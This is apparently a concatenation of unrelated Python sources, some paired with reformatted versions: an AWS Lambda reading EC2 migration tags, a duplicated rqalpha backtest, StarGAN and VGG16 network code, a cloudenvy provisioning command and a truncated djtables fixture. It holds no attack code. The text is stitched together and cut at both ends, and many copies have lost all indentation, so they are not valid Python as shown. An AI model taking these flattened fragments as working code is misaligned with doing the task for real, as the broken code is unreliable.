    MigrationStateHandler().update_state(state="INSTANCE_LAUNCHED", machine_name=event_dict.get("name"))
    return event_dict
from __future__ import annotations
import json
import os
from typing import Any, Dict
import boto3
from migrationstate import MigrationStateHandler
print("Loading function find_instance")
# Module-level AWS clients: created once per Lambda container and reused
# across warm invocations.
ec2_resource = boto3.resource("ec2")
# NOTE(review): `sqs` is never used in this module -- confirm before removing.
sqs = boto3.client("sqs")
# {
# "version": "0",
# "id": "7e979767-95bb-1972-0cab-a670ec5d5000",
# "detail-type": "EC2 Instance State-change Notification",
# "source": "aws.ec2",
# "account": "460535642604",
# "time": "2019-08-23T13:45:28Z",
# "region": "us-east-1",
# "resources": [
# "arn:aws:ec2:us-east-1:460535642604:instance/i-00c758f34483a2ea2"
# ],
# "detail": {
# "instance-id": "i-00c758f34483a2ea2",
# "state": "running"
# }
# }
def lambda_handler(event: Dict[str, Any], context: Any) -> Dict[str, Any]:
    """Look up the EC2 instance named in *event* and collect its migration tags.

    Fix: the return annotation was ``-> str`` but the function always returns
    a dict.

    Returns a dict whose ``instance_id`` is the real id when the instance
    carries ``CloneStatus=NOT_STARTED``, ``"not-migration"`` when the
    migration already started, or ``"not-found"`` when the id is missing or
    cannot be resolved.  Destination account/KMS/role and the instance name
    are copied from the matching tags when present.
    """
    print("Received event: " + json.dumps(event, indent=2))
    detail: Dict[str, Any] = event.get("detail", {})
    event_dict: Dict[str, Any] = {}
    instance_id: str = detail.get("instance-id", "")
    if not instance_id:
        event_dict["instance_id"] = "not-found"
        return event_dict
    try:
        instance = ec2_resource.Instance(instance_id)
        # Look for tags that show it is a CE migration that has not run yet.
        for tag in instance.tags:
            if tag["Key"] == "CloneStatus":
                if tag["Value"] == "NOT_STARTED":
                    event_dict["instance_id"] = instance_id
                else:
                    event_dict["instance_id"] = "not-migration"
            if tag["Key"] == "DestinationAccount":
                event_dict["account"] = tag["Value"]
            if tag["Key"] == "DestinationKMS":
                event_dict["kms_id"] = tag["Value"]
            if tag["Key"] == "DestinationRole":
                event_dict["role"] = tag["Value"]
            if tag["Key"] == "Name":
                event_dict["name"] = tag["Value"]
    except Exception as e:  # boundary handler: degrade to "not-found"
        print(e)
        event_dict["instance_id"] = "not-found"
    # NOTE(review): machine_name may be None when the instance had no Name
    # tag -- confirm MigrationStateHandler tolerates that.
    MigrationStateHandler().update_state(state="INSTANCE_LAUNCHED", machine_name=event_dict.get("name"))
    return event_dict
from rqalpha.api import *
import talib
from rqalpha import run_func
import numpy as np
import datetime
"""
Bar(symbol: u'\u73e0\u6c5f\u94a2\u7434', order_book_id: u'002678.XSHE', datetime: datetime.datetime(2014, 1, 2, 0, 0),
open: 7.08, close: 7.07, high: 7.14, low: 7.03, volume: 3352317.0, total_turnover: 23756852, limit_up: 7.78, limit_down: 6.36)
rqalpha run -f lstm.py -s 2014-01-01 -e 2018-01-01 --account stock 100000 --plot
http://scikit-learn.org/stable/modules/preprocessing.html#standardization-or-mean-removal-and-variance-scaling
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
rqalpha run -f get_day_close_price.py -s 2000-01-01 -e 2017-01-01 -o result.pkl --plot --progress --account stock 10000
"""
#scheduler调用的函数需要包括context, bar_dict两个参数
def week_close_prise(context, bar_dict):
    """Collect the latest close price of every tracked instrument.

    Appends each bar's close to ``context.all_close_price`` (keyed by order
    book id) and remembers the bar timestamp in ``context.today``.
    """
    logger.info("Remaning cash: %r" % context.portfolio.cash)
    for sym in context.all:
        bar = bar_dict[sym]
        # logger.info(bar)
        order_book_id = bar.order_book_id
        # history_close = history_bars(order_book_id, 50, '1d', 'close')
        info = "%s id: %s close: %s" % (bar.symbol, bar.order_book_id, bar.close)
        # logger.info(info)
        name = bar.symbol
        book_id = bar.order_book_id
        close_price = bar.close
        if context.all_close_price.get(book_id, []):
            context.all_close_price[book_id].append(close_price)
        else:
            context.all_close_price[book_id] = [close_price]
        context.today = bar.datetime
# 在这个方法中编写任何的初始化逻辑。context对象将会在你的算法策略的任何方法之间做传递。
def init(context):
"""Strategy initialisation: set up the shared state carried on *context*."""
# NOTE(review): week_close_prise() iterates context.all, which is never
# initialised here -- confirm it is injected elsewhere before scheduling.
# Keep global state on the context object.
context.all_close_price = {}
context.today = None
# before_trading此函数会在每天策略交易开始前被调用,当天只会被调用一次
def before_trading(context):
"""Called once per day before the market opens."""
logger.info("开盘前执行before_trading函数")
# Triggered on every data update (daily/minute bar or realtime tick).
def handle_bar(context, bar_dict):
"""Called for every bar of the subscribed instruments."""
logger.info("每一个Bar执行")
logger.info("打印Bar数据:")
#np.save("%s_X" % context.s1, np.array(context.X))
#np.save("%s_y" % context.s1, np.array(context.y))
# after_trading is called once per day after the close.
def after_trading(context):
"""Called once per day after trading ends."""
logger.info("收盘后执行after_trading函数")
def end(context):
"""Called once when the whole backtest finishes."""
logger.info("--------------end-------------")
logger.info("------------end---------------")
config = {
"base": {
# Backtest window.
"start_date": "2016-04-01",
"end_date": "2016-12-01",
"accounts": {
# Initial stock-account cash.
"stock": 100000
}
},
"extra": {
"log_level": "verbose",
},
"mod": {
# Enable the analyser mod so results are collected and plotted.
"sys_analyser": {
"enabled": True,
"plot": True
}
}
}
# You can pass extra parameters of your choosing here.
# Launch the backtest with the callbacks defined above.
run_func(init=init, before_trading=before_trading, handle_bar=handle_bar, end=end, config=config)
from rqalpha.api import *
import talib
from rqalpha import run_func
import numpy as np
import datetime
"""
Bar(symbol: u'\u73e0\u6c5f\u94a2\u7434', order_book_id: u'002678.XSHE', datetime: datetime.datetime(2014, 1, 2, 0, 0),
open: 7.08, close: 7.07, high: 7.14, low: 7.03, volume: 3352317.0, total_turnover: 23756852, limit_up: 7.78, limit_down: 6.36)
rqalpha run -f lstm.py -s 2014-01-01 -e 2018-01-01 --account stock 100000 --plot
http://scikit-learn.org/stable/modules/preprocessing.html#standardization-or-mean-removal-and-variance-scaling
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
rqalpha run -f get_day_close_price.py -s 2000-01-01 -e 2017-01-01 -o result.pkl --plot --progress --account stock 10000
"""
#scheduler调用的函数需要包括context, bar_dict两个参数
def week_close_prise(context, bar_dict):
    """Collect the latest close price of every tracked instrument.

    Appends each bar's close to ``context.all_close_price`` (keyed by order
    book id) and remembers the bar timestamp in ``context.today``.
    """
    logger.info("Remaning cash: %r" % context.portfolio.cash)
    for sym in context.all:
        bar = bar_dict[sym]
        # logger.info(bar)
        order_book_id = bar.order_book_id
        # history_close = history_bars(order_book_id, 50, '1d', 'close')
        info = "%s id: %s close: %s" % (bar.symbol, bar.order_book_id, bar.close)
        # logger.info(info)
        name = bar.symbol
        book_id = bar.order_book_id
        close_price = bar.close
        if context.all_close_price.get(book_id, []):
            context.all_close_price[book_id].append(close_price)
        else:
            context.all_close_price[book_id] = [close_price]
        context.today = bar.datetime
# 在这个方法中编写任何的初始化逻辑。context对象将会在你的算法策略的任何方法之间做传递。
def init(context):
"""Strategy initialisation: set up the shared state carried on *context*."""
# NOTE(review): week_close_prise() iterates context.all, which is never
# initialised here -- confirm it is injected elsewhere before scheduling.
# Keep global state on the context object.
context.all_close_price = {}
context.today = None
# before_trading此函数会在每天策略交易开始前被调用,当天只会被调用一次
def before_trading(context):
"""Called once per day before the market opens."""
logger.info("开盘前执行before_trading函数")
# Triggered on every data update (daily/minute bar or realtime tick).
def handle_bar(context, bar_dict):
"""Called for every bar of the subscribed instruments."""
logger.info("每一个Bar执行")
logger.info("打印Bar数据:")
#np.save("%s_X" % context.s1, np.array(context.X))
#np.save("%s_y" % context.s1, np.array(context.y))
# after_trading is called once per day after the close.
def after_trading(context):
"""Called once per day after trading ends."""
logger.info("收盘后执行after_trading函数")
def end(context):
"""Called once when the whole backtest finishes."""
logger.info("--------------end-------------")
logger.info("------------end---------------")
config = {
"base": {
# Backtest window.
"start_date": "2016-04-01",
"end_date": "2016-12-01",
"accounts": {
# Initial stock-account cash.
"stock": 100000
}
},
"extra": {
"log_level": "verbose",
},
"mod": {
# Enable the analyser mod so results are collected and plotted.
"sys_analyser": {
"enabled": True,
"plot": True
}
}
}
# You can pass extra parameters of your choosing here.
# Launch the backtest with the callbacks defined above.
run_func(init=init, before_trading=before_trading, handle_bar=handle_bar, end=end, config=config)
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow_gan.examples.stargan import layers
from tensorflow_gan.examples.stargan import ops
def generator(inputs, targets):
  """StarGAN generator: translate `inputs` toward the `targets` domain.

  PyTorch reference:
  https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/model.py#L22

  Args:
    inputs: Tensor of shape (batch_size, h, w, c), the images/information
      to transform.
    targets: Tensor of shape (batch_size, num_domains), the target domain
      the generator should transform the image/information to.

  Returns:
    Tensor with the same shape as `inputs`.
  """
  with tf.variable_scope('generator'):
    # Attach the target-domain condition to the input (see ops helper),
    # then run the down-sample / bottleneck / up-sample pipeline.
    net = ops.condition_input_with_pixel_padding(inputs, targets)
    net = layers.generator_down_sample(net)
    net = layers.generator_bottleneck(net)
    # Restore the original channel count on the way back up.
    net = layers.generator_up_sample(net, inputs.shape[-1])
  return net
def discriminator(input_net, class_num):
"""Discriminator Module.
Piece everything together and reshape the output source tensor
PyTorch Version:
https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/model.py#L63
Notes:
The PyTorch Version run the reduce_mean operation later in their solver:
https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/solver.py#L245
Args:
input_net: Tensor of shape (batch_size, h, w, c) as batch of images.
class_num: (int) number of domain to be predicted
Returns:
output_src: Tensor of shape (batch_size) where each value is a logit
representing whether the image is real of fake.
output_cls: Tensor of shape (batch_size, class_um) where each value is a
logit representing whether the image is in the associated domain.
"""
with tf.variable_scope('discriminator'):
hidden = layers.discriminator_input_hidden(input_net)
output_src = layers.discriminator_output_source(hidden)
output_src = tf.layers.flatten(output_src)
output_src = tf.reduce_mean(input_tensor=output_src, axis=1)
output_cls = layers.discriminator_output_class(hidden, class_num)
return output_src, output_cls | tensorflow_gan/examples/stargan/network.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow_gan.examples.stargan import layers
from tensorflow_gan.examples.stargan import ops
def generator(inputs, targets):
"""Generator module.
Piece everything together for the Generator.
PyTorch Version:
https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/model.py#L22
Args:
inputs: Tensor of shape (batch_size, h, w, c) representing the
images/information that we want to transform.
targets: Tensor of shape (batch_size, num_domains) representing the target
domain the generator should transform the image/information to.
Returns:
Tensor of shape (batch_size, h, w, c) as the inputs.
"""
with tf.variable_scope('generator'):
input_with_condition = ops.condition_input_with_pixel_padding(
inputs, targets)
down_sample = layers.generator_down_sample(input_with_condition)
bottleneck = layers.generator_bottleneck(down_sample)
up_sample = layers.generator_up_sample(bottleneck, inputs.shape[-1])
return up_sample
def discriminator(input_net, class_num):
  """StarGAN discriminator: real/fake score plus domain classification.

  PyTorch reference:
  https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/model.py#L63

  Note: the PyTorch version applies its reduce_mean later, in the solver:
  https://github.com/yunjey/StarGAN/blob/fbdb6a6ce2a4a92e1dc034faec765e0dbe4b8164/solver.py#L245

  Args:
    input_net: Tensor of shape (batch_size, h, w, c), a batch of images.
    class_num: (int) number of domains to be predicted.

  Returns:
    A pair (output_src, output_cls): real/fake logits of shape
    (batch_size,) and per-domain logits of shape (batch_size, class_num).
  """
  with tf.variable_scope('discriminator'):
    hidden = layers.discriminator_input_hidden(input_net)
    # Collapse the spatial source map into a single logit per image.
    source_map = layers.discriminator_output_source(hidden)
    output_src = tf.reduce_mean(
        input_tensor=tf.layers.flatten(source_map), axis=1)
    output_cls = layers.discriminator_output_class(hidden, class_num)
    return output_src, output_cls
import tensorflow as tf
from poda.layers.merge import *
from poda.layers.dense import *
from poda.layers.activation import *
from poda.layers.regularizer import *
from poda.layers.convolutional import *
class VGG16(object):
def __init__(self, input_tensor, num_blocks=5, classes=1000, batch_normalizations = True, num_depthwise_layers=None, num_dense_layers=1, num_hidden_units=4096, activation_denses='relu', dropout_rates=None, regularizers=None, scopes=None):
"""[summary]
Arguments:
object {[type]} -- [description]
input_tensor {[type]} -- [description]
Keyword Arguments:
classes {int} -- [description] (default: {1000})
batch_normalization {bool} -- [description] (default: {True})
"""
self.input_tensor = input_tensor
self.num_block = num_blocks
self.classes = classes
self.batch_normalization = batch_normalizations
self.num_depthwise_layer = num_depthwise_layers
self.num_dense_layer = num_dense_layers
self.num_hidden_unit = num_hidden_units
self.activation_dense = activation_denses
self.dropout_rate = dropout_rates
self.regularizer = regularizers
self.scope = scopes
def vgg_block(self, input_tensor, num_block=5, batch_normalization=True):
with tf.compat.v1.variable_scope(self.scope, 'vgg_16', [input_tensor]):
with tf.compat.v1.variable_scope('Block_1'):
conv_1 = convolution_2d(input_tensor=input_tensor, number_filters=64, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_2 = convolution_2d(input_tensor=conv_1, number_filters=64, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_3 = max_pool_2d(input_tensor=conv_2, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_2'):
conv_4 = convolution_2d(input_tensor=conv_3, number_filters=128, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_5 = convolution_2d(input_tensor=conv_4, number_filters=128, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_6 = max_pool_2d(input_tensor=conv_5, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_3'):
conv_7 = convolution_2d(input_tensor=conv_6, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_8 = convolution_2d(input_tensor=conv_7, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_9 = convolution_2d(input_tensor=conv_8, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_10 = max_pool_2d(input_tensor=conv_9, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_4'):
conv_11 = convolution_2d(input_tensor=conv_10, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_12 = convolution_2d(input_tensor=conv_11, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_13 = convolution_2d(input_tensor=conv_12, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_14 = max_pool_2d(input_tensor=conv_13, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
with tf.compat.v1.variable_scope('Block_5'):
conv_15 = convolution_2d(input_tensor=conv_14, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_16 = convolution_2d(input_tensor=conv_15, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_17 = convolution_2d(input_tensor=conv_16, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
conv_18 = max_pool_2d(input_tensor=conv_17, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
if num_block==1:
vgg_16 = conv_3
elif num_block==2:
vgg_16 = conv_6
elif num_block==3:
vgg_16 = conv_10
elif num_block==4:
vgg_16 = conv_14
elif num_block==5:
vgg_16 = conv_18
else:
vgg_16 = conv_18
return vgg_16
def create_model(self):
number_filter = self.input_tensor.get_shape().as_list()[-1]
vgg_base = self.vgg_block(input_tensor=self.input_tensor, num_block=self.num_block, batch_normalization=self.batch_normalization)
base_var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES)
with tf.compat.v1.variable_scope(self.scope, 'vgg_16', [vgg_base]):
if self.num_depthwise_layer!=None or self.num_depthwise_layer>0:
for j in range(0,self.num_depthwise_layer):
##### FIX THIS TOMORROW
vgg_base = depthwise_convolution_2d(input_tensor=vgg_base, number_filters=number_filter, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', dropout_rates=None, names=None)
else:
flatten_layer = flatten(input_tensor=vgg_base, names='flatten')
for i in range(0, self.num_dense_layer):
vgg_base = dense(input_tensor=flatten_layer, hidden_units=self.num_hidden_unit, activations=self.activation_dense, regularizers=self.regularizer, scale=self.dropout_rate)
last_layer = flatten(input_tensor=vgg_base, names='flatten')
full_var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES)
non_logit = dense(input_tensor=last_layer, hidden_units=self.classes, names='output')
if self.classes > 2:
output = softmax(input_tensor=non_logit, names='output')
else:
output = sigmoid(input_tensor=non_logit, names='output')
return non_logit, output, base_var_list, full_var_list | poda/transfer_learning/Vgg16.py | import tensorflow as tf
from poda.layers.merge import *
from poda.layers.dense import *
from poda.layers.activation import *
from poda.layers.regularizer import *
from poda.layers.convolutional import *
class VGG16(object):
    """VGG-16 feature extractor with a configurable classification head.

    ``create_model`` builds ``num_blocks`` convolutional blocks of the
    classic VGG-16 layout, then either a stack of depthwise convolutions
    or a stack of dense layers, and finally a ``classes``-unit logit layer.
    """

    def __init__(self, input_tensor, num_blocks=5, classes=1000, batch_normalizations = True, num_depthwise_layers=None, num_dense_layers=1, num_hidden_units=4096, activation_denses='relu', dropout_rates=None, regularizers=None, scopes=None):
        """Store hyper-parameters; no graph is built until create_model().

        Arguments:
            input_tensor {tf.Tensor} -- 4-D input batch (batch, h, w, c).

        Keyword Arguments:
            num_blocks {int} -- how many VGG conv blocks to keep, 1-5 (default: {5})
            classes {int} -- units in the final logit layer (default: {1000})
            batch_normalizations {bool} -- batch-norm inside conv layers (default: {True})
            num_depthwise_layers {int|None} -- if a positive int, use that many
                depthwise conv layers as the head instead of dense layers.
            num_dense_layers {int} -- dense layers in the head (default: {1})
            num_hidden_units {int} -- width of each dense layer (default: {4096})
            activation_denses {str} -- activation for the dense layers.
            dropout_rates -- ``scale`` argument forwarded to ``dense``.
            regularizers -- regularizer spec forwarded to ``dense``.
            scopes {str|None} -- outer variable-scope name (default 'vgg_16').
        """
        self.input_tensor = input_tensor
        self.num_block = num_blocks
        self.classes = classes
        self.batch_normalization = batch_normalizations
        self.num_depthwise_layer = num_depthwise_layers
        self.num_dense_layer = num_dense_layers
        self.num_hidden_unit = num_hidden_units
        self.activation_dense = activation_denses
        self.dropout_rate = dropout_rates
        self.regularizer = regularizers
        self.scope = scopes

    def vgg_block(self, input_tensor, num_block=5, batch_normalization=True):
        """Build the five VGG-16 conv blocks and return block ``num_block``'s output.

        Note: all five blocks are always constructed (so their variables
        always exist in the graph); ``num_block`` only selects which
        intermediate tensor is returned.
        """
        with tf.compat.v1.variable_scope(self.scope, 'vgg_16', [input_tensor]):
            with tf.compat.v1.variable_scope('Block_1'):
                conv_1 = convolution_2d(input_tensor=input_tensor, number_filters=64, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_2 = convolution_2d(input_tensor=conv_1, number_filters=64, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_3 = max_pool_2d(input_tensor=conv_2, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
            with tf.compat.v1.variable_scope('Block_2'):
                conv_4 = convolution_2d(input_tensor=conv_3, number_filters=128, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_5 = convolution_2d(input_tensor=conv_4, number_filters=128, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_6 = max_pool_2d(input_tensor=conv_5, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
            with tf.compat.v1.variable_scope('Block_3'):
                conv_7 = convolution_2d(input_tensor=conv_6, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_8 = convolution_2d(input_tensor=conv_7, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_9 = convolution_2d(input_tensor=conv_8, number_filters=256, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_10 = max_pool_2d(input_tensor=conv_9, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
            with tf.compat.v1.variable_scope('Block_4'):
                conv_11 = convolution_2d(input_tensor=conv_10, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_12 = convolution_2d(input_tensor=conv_11, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_13 = convolution_2d(input_tensor=conv_12, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_14 = max_pool_2d(input_tensor=conv_13, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
            with tf.compat.v1.variable_scope('Block_5'):
                conv_15 = convolution_2d(input_tensor=conv_14, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_16 = convolution_2d(input_tensor=conv_15, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_17 = convolution_2d(input_tensor=conv_16, number_filters=512, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', batch_normalizations=batch_normalization, dropout_rates=None, names=None)
                conv_18 = max_pool_2d(input_tensor=conv_17, pool_sizes=(2,2), stride_sizes=(2,2), paddings='valid', names=None)
            # Select the requested block output; anything out of range
            # falls back to the full 5-block stack (same as the original
            # if/elif chain's final else).
            block_outputs = {1: conv_3, 2: conv_6, 3: conv_10, 4: conv_14, 5: conv_18}
            vgg_16 = block_outputs.get(num_block, conv_18)
        return vgg_16

    def create_model(self):
        """Build the head and logits on top of the VGG blocks.

        Returns:
            (non_logit, output, base_var_list, full_var_list): raw logits,
            the softmax/sigmoid output, and the global-variable lists
            captured before/after the head was built.
        """
        number_filter = self.input_tensor.get_shape().as_list()[-1]
        vgg_base = self.vgg_block(input_tensor=self.input_tensor, num_block=self.num_block, batch_normalization=self.batch_normalization)
        base_var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES)
        with tf.compat.v1.variable_scope(self.scope, 'vgg_16', [vgg_base]):
            # Bug fix: the original test was `!= None or > 0`, which raised
            # TypeError (None > 0) for the default num_depthwise_layers=None.
            # The depthwise head applies only for an explicit positive count.
            if self.num_depthwise_layer is not None and self.num_depthwise_layer > 0:
                for _ in range(self.num_depthwise_layer):
                    vgg_base = depthwise_convolution_2d(input_tensor=vgg_base, number_filters=number_filter, kernel_sizes=(3,3), stride_sizes=(1,1), paddings='same', activations='relu', dropout_rates=None, names=None)
            else:
                # Bug fix: each dense layer now consumes the previous one's
                # output; the original fed the same flatten output to every
                # iteration, so stacked dense layers were never chained.
                vgg_base = flatten(input_tensor=vgg_base, names='flatten')
                for _ in range(self.num_dense_layer):
                    vgg_base = dense(input_tensor=vgg_base, hidden_units=self.num_hidden_unit, activations=self.activation_dense, regularizers=self.regularizer, scale=self.dropout_rate)
            last_layer = flatten(input_tensor=vgg_base, names='flatten')
            full_var_list = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES)
            non_logit = dense(input_tensor=last_layer, hidden_units=self.classes, names='output')
            # Multi-class -> softmax; binary -> single sigmoid output.
            if self.classes > 2:
                output = softmax(input_tensor=non_logit, names='output')
            else:
                output = sigmoid(input_tensor=non_logit, names='output')
        return non_logit, output, base_var_list, full_var_list
import logging
import os
import time
import fabric.api
import fabric.operations
import cloudenvy.core
class Provision(cloudenvy.core.Command):
def _build_subparser(self, subparsers):
help_str = 'Upload and execute script(s) in your Envy.'
subparser = subparsers.add_parser('provision', help=help_str,
description=help_str)
subparser.set_defaults(func=self.run)
subparser.add_argument('-n', '--name', action='store', default='',
help='Specify custom name for an Envy.')
subparser.add_argument('-s', '--scripts', nargs='*', metavar='PATH',
help='Specify one or more scripts.')
return subparser
def run(self, config, args):
envy = cloudenvy.core.Envy(config)
logging.info('Running provision scripts for Envy \'%s\'.' %
envy.name)
if not envy.ip():
logging.error('Could not determine IP.')
return
with fabric.api.settings(
host_string=envy.ip(), user=envy.config.remote_user,
forward_agent=True, disable_known_hosts=True):
if args.scripts:
scripts = [os.path.expanduser(script) for
script in args.scripts]
elif 'provision_scripts' in envy.config.project_config:
scripts = [os.path.expanduser(script) for script in
envy.config.project_config['provision_scripts']]
elif 'provision_script_path' in envy.config.project_config:
provision_script = envy.config.project_config['provision_script_path']
scripts = [os.path.expanduser(provision_script)]
else:
raise SystemExit('Please specify the path to your provision '
'script(s) by either using the `--scripts` '
'flag, or by defining the `provision_scripts`'
' config option in your Envyfile.')
for script in scripts:
logging.info('Running provision script from \'%s\'', script)
for i in range(24):
try:
path = script
filename = os.path.basename(script)
remote_path = '~/%s' % filename
fabric.operations.put(path, remote_path, mode=0755)
fabric.operations.run(remote_path)
break
except fabric.exceptions.NetworkError:
logging.debug(
'Unable to upload the provision script '
'from `%s`. Trying again in 10 seconds.' % path
)
time.sleep(10)
logging.info('Provision script \'%s\' finished.' % path) | cloudenvy/commands/provision.py | import logging
import os
import time

import fabric.api
import fabric.exceptions
import fabric.operations

import cloudenvy.core
class Provision(cloudenvy.core.Command):
    """CLI command: upload and execute provision script(s) inside an Envy."""

    def _build_subparser(self, subparsers):
        """Register the ``provision`` sub-command and its arguments."""
        help_str = 'Upload and execute script(s) in your Envy.'
        subparser = subparsers.add_parser('provision', help=help_str,
                                          description=help_str)
        subparser.set_defaults(func=self.run)
        subparser.add_argument('-n', '--name', action='store', default='',
                               help='Specify custom name for an Envy.')
        subparser.add_argument('-s', '--scripts', nargs='*', metavar='PATH',
                               help='Specify one or more scripts.')
        return subparser

    def run(self, config, args):
        """Resolve the script list, then upload and run each one over SSH.

        Script sources, in priority order: the ``--scripts`` flag, the
        ``provision_scripts`` Envyfile option, then the legacy
        ``provision_script_path`` option.
        """
        envy = cloudenvy.core.Envy(config)
        logging.info('Running provision scripts for Envy \'%s\'.' %
                     envy.name)
        if not envy.ip():
            logging.error('Could not determine IP.')
            return
        with fabric.api.settings(
                host_string=envy.ip(), user=envy.config.remote_user,
                forward_agent=True, disable_known_hosts=True):
            if args.scripts:
                scripts = [os.path.expanduser(script) for
                           script in args.scripts]
            elif 'provision_scripts' in envy.config.project_config:
                scripts = [os.path.expanduser(script) for script in
                           envy.config.project_config['provision_scripts']]
            elif 'provision_script_path' in envy.config.project_config:
                provision_script = envy.config.project_config[
                    'provision_script_path']
                scripts = [os.path.expanduser(provision_script)]
            else:
                raise SystemExit('Please specify the path to your provision '
                                 'script(s) by either using the `--scripts` '
                                 'flag, or by defining the `provision_scripts`'
                                 ' config option in your Envyfile.')
            for script in scripts:
                logging.info('Running provision script from \'%s\'', script)
                remote_path = '~/%s' % os.path.basename(script)
                # The Envy may still be booting; retry for up to 4 minutes.
                for _ in range(24):
                    try:
                        # 0o755: upload as executable. The original literal
                        # 0755 is a SyntaxError on Python 3; 0o755 works on
                        # Python 2.6+ and 3.x alike.
                        fabric.operations.put(script, remote_path, mode=0o755)
                        fabric.operations.run(remote_path)
                        break
                    except fabric.exceptions.NetworkError:
                        logging.debug(
                            'Unable to upload the provision script '
                            'from `%s`. Trying again in 10 seconds.' % script
                        )
                        time.sleep(10)
                else:
                    # All retries failed; say so instead of logging success.
                    logging.error(
                        'Giving up on provision script `%s` after 24 '
                        'attempts.' % script)
                    continue
                logging.info('Provision script \'%s\' finished.' % script)
from django.http import HttpRequest, QueryDict
from djtables.table import Table
from djtables.column import Column
# Fixture rows: plain dicts so the table code is tested without an ORM.
DATA = [
    {'name': "Leonardo", 'weapon': "Katana" },
    {'name': "Michelangelo", 'weapon': "Nunchaku"},
    {'name': "Donatello", 'weapon': "Bo Staff"},
